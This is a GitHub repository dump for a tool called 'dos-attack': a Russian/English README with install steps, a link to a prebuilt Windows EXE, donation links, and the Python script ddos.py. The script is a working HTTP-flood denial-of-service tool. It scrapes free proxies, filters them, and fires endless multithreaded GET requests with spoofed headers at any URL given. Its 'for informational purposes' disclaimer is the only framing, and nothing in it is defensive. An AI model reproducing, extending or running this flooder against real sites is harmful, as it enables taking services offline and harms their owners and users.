├── README.md ├── ddos.py └── logo.png /README.md: -------------------------------------------------------------------------------- 1 | [![made-with-python](https://img.shields.io/badge/Made%20with-Python-1f425f.svg)](https://www.python.org/) [![GitHub contributors](https://img.shields.io/github/contributors/fsystem88/dos-attack.svg)](https://GitHub.com/fsystem88/dos-attack/graphs/contributors/) ![repo-size](https://img.shields.io/github/repo-size/fsystem88/dos-attack) 2 | 3 | # DoS attack 4 |
5 | The program uses a simple type of DDoS attack "HTTP flood" using multithreading and bots (proxy servers). The program was created for informational purposes!
6 | Программа использует простой тип DDoS-атаки "HTTP flood" с использованием многопоточности и ботов (прокси-серверов). Программа была создана в информационных целях!
7 | 8 | # Обязательно подпишитесь на канал в телеграме, там может решаться дальнейшая судьба проекта или очень важная информация!!! 9 |
---> Канал в Telegram <---
10 | 11 | # Установка 12 | apt update && apt upgrade -y 13 | apt install git python -y 14 | python3 -m pip install requests colorama click fake_headers 15 | git clone https://github.com/FSystem88/dos-attack 16 | cd dos-attack 17 | 18 | # Запуск 19 | python3 ddos.py --help 20 | Usage: ddos.py [OPTIONS] 21 | 22 | Options: 23 | -p, --proxy TEXT File with a proxy 24 | -u, --url TEXT URL 25 | --help Show this message and exit. 26 | 27 | Либо просто: 28 | 29 | python3 ddos.py 30 | 31 | # For Windows 32 | Просто скачать и заупстить EXE:
33 | [DDOS.exe](https://github.com/FSystem88/dos-attack/releases/download/v4/DDOS.exe) 34 | 35 | # Обновить 36 | cd ~/dos-attack/ && git pull 37 | 38 | # Приму в дар деньги на пиво! :)) 39 | в любой валюте))
40 | Донатерная!
41 | 1. [Tinkoff](https://www.tinkoff.ru/rm/godunov.ivan1/jlHwa57720)
42 | 3. [YANDEX MONEY](https://yoomoney.ru/to/410015440700904)
43 |
44 | Free programmers also need to eat :) 45 |
46 | -------------------------------------------------------------------------------- /ddos.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # Dev: FSystem88 4 | # Version: 5 5 | 6 | import requests as r, os, threading, random, click, fake_headers 7 | from threading import Thread 8 | from colorama import Fore, Style, Back 9 | from fake_headers import Headers 10 | 11 | def clear(): 12 | if os.name == 'nt': 13 | os.system('cls') 14 | else: 15 | os.system('clear') 16 | 17 | def logo(): 18 | print(Fore.GREEN+"\n██████"+Fore.RED+"╗░"+Fore.GREEN+"██████"+Fore.RED+"╗░░"+Fore.GREEN+"█████"+Fore.RED+"╗░░"+Fore.GREEN+"██████"+Fore.RED+"╗"+Fore.GREEN+"███████"+Fore.RED+"╗"+Fore.GREEN+"██████"+Fore.RED+"╗░"+Fore.GREEN+"\n"+Fore.GREEN+"██"+Fore.RED+"╔══"+Fore.GREEN+"██"+Fore.RED+"╗"+Fore.GREEN+"██"+Fore.RED+"╔══"+Fore.GREEN+"██"+Fore.RED+"╗"+Fore.GREEN+"██"+Fore.RED+"╔══"+Fore.GREEN+"██"+Fore.RED+"╗"+Fore.GREEN+"██"+Fore.RED+"╔════╝"+Fore.GREEN+"██"+Fore.RED+"╔════╝"+Fore.GREEN+"██"+Fore.RED+"╔══"+Fore.GREEN+"██"+Fore.RED+"╗"+Fore.GREEN+"\n"+Fore.GREEN+"██"+Fore.RED+"║░░"+Fore.GREEN+"██"+Fore.RED+"║"+Fore.GREEN+"██"+Fore.RED+"║░░"+Fore.GREEN+"██"+Fore.RED+"║"+Fore.GREEN+"██"+Fore.RED+"║░░"+Fore.GREEN+"██"+Fore.RED+"║╚"+Fore.GREEN+"█████"+Fore.RED+"╗░"+Fore.GREEN+"█████"+Fore.RED+"╗░░"+Fore.GREEN+"██████"+Fore.RED+"╔╝"+Fore.GREEN+"\n"+Fore.GREEN+"██"+Fore.RED+"║░░"+Fore.GREEN+"██"+Fore.RED+"║"+Fore.GREEN+"██"+Fore.RED+"║░░"+Fore.GREEN+"██"+Fore.RED+"║"+Fore.GREEN+"██"+Fore.RED+"║░░"+Fore.GREEN+"██"+Fore.RED+"║░╚═══"+Fore.GREEN+"██"+Fore.RED+"╗"+Fore.GREEN+"██"+Fore.RED+"╔══╝░░"+Fore.GREEN+"██"+Fore.RED+"╔══"+Fore.GREEN+"██"+Fore.RED+"╗"+Fore.GREEN+"\n"+Fore.GREEN+"██████"+Fore.RED+"╔╝"+Fore.GREEN+"██████"+Fore.RED+"╔╝╚"+Fore.GREEN+"█████"+Fore.RED+"╔╝"+Fore.GREEN+"██████"+Fore.RED+"╔╝"+Fore.GREEN+"███████"+Fore.RED+"╗"+Fore.GREEN+"██"+Fore.RED+"║░░"+Fore.GREEN+"██"+Fore.RED+"║"+Fore.GREEN+"\n"+Fore.RED+"╚═════╝░╚═════╝░░╚════╝░╚═════╝░╚══════╝╚═╝░░╚═╝"+Fore.YELLOW+"\n\n[ Dev: FSystem88 ~ prod. by Ca$h&Мир ]\n[ The program uses a simple type of DDoS attack\n \"HTTP flood\" using multithreading and a proxies ]\n[ The program was created for informational purposes !!! ]\n\n"+Fore.GREEN+"[ Qiwi: https://qiwi.com/n/FSYSTEM88 ]\n"+Style.RESET_ALL) 19 | 20 | def check_prox(array, url): 21 | ip = r.post("http://ip.beget.ru/").text 22 | for prox in array: 23 | thread_list = [] 24 | t = threading.Thread (target=check, args=(ip, prox, url)) 25 | thread_list.append(t) 26 | t.start() 27 | 28 | def check(ip, prox, url): 29 | try: 30 | ipx = r.get("http://ip.beget.ru/", proxies={'http': "http://{}".format(prox), 'https':"http://{}".format(prox)}).text 31 | except: 32 | ipx = ip 33 | if ip != ipx: 34 | print(Fore.BLACK+Back.GREEN+"{} good! Starting...".format(prox)+Style.RESET_ALL) 35 | thread_list = [] 36 | t = threading.Thread (target=ddos, args=(prox, url)) 37 | thread_list.append(t) 38 | t.start() 39 | 40 | def ddos(prox, url): 41 | proxies={"http":"http://{}".format(prox), "https":"http://{}".format(prox)} 42 | colors = [Fore.RED, Fore.GREEN, Fore.YELLOW, Fore.BLUE, Fore.CYAN, Fore.MAGENTA, Fore.WHITE] 43 | color = random.choice(colors) 44 | while True: 45 | headers = Headers(headers=True).generate() 46 | thread_list = [] 47 | t = threading.Thread (target=start_ddos, args=(prox, url, headers, proxies, color)) 48 | thread_list.append(t) 49 | t.start() 50 | 51 | def start_ddos(prox, url, headers, proxies, color): 52 | try: 53 | s = r.Session() 54 | req = s.get(url, headers=headers, proxies=proxies) 55 | if req.status_code == 200: 56 | print(color+"{} send requests...".format(prox)) 57 | except: 58 | pass 59 | 60 | @click.command() 61 | @click.option('--proxy', '-p', help="File with a proxy") 62 | @click.option('--url', '-u', help="URL") 63 | def main(proxy, url): 64 | clear() 65 | logo() 66 | if url == None: 67 | url = input("URL: ") 68 | if url[:4] != "http": 69 | print(Fore.RED+"Enter the full URL (example: http*://****.**/)"+Style.RESET_ALL) 70 | exit() 71 | if proxy == None: 72 | while True: 73 | req = r.get("https://api.proxyscrape.com/?request=displayproxies") 74 | array = req.text.split() 75 | print(Back.YELLOW+Fore.WHITE+"Found {} new proxies".format(len(array))+Style.RESET_ALL) 76 | check_prox(array, url) 77 | else: 78 | try: 79 | fx = open(proxy) 80 | array = fx.read().split() 81 | print("Found {} proxies in {}.\nChecking proxies...".format(len(array), proxy)) 82 | check_prox(array, url) 83 | except FileNotFoundError: 84 | print(Fore.RED+"File {} not found.".format(proxy)+Style.RESET_ALL) 85 | exit() 86 | 87 | main() 88 | -------------------------------------------------------------------------------- /logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FSystem88/dos-attack/5b90bdc63d0250766adfab2877372fadd4d1ddbb/logo.png --------------------------------------------------------------------------------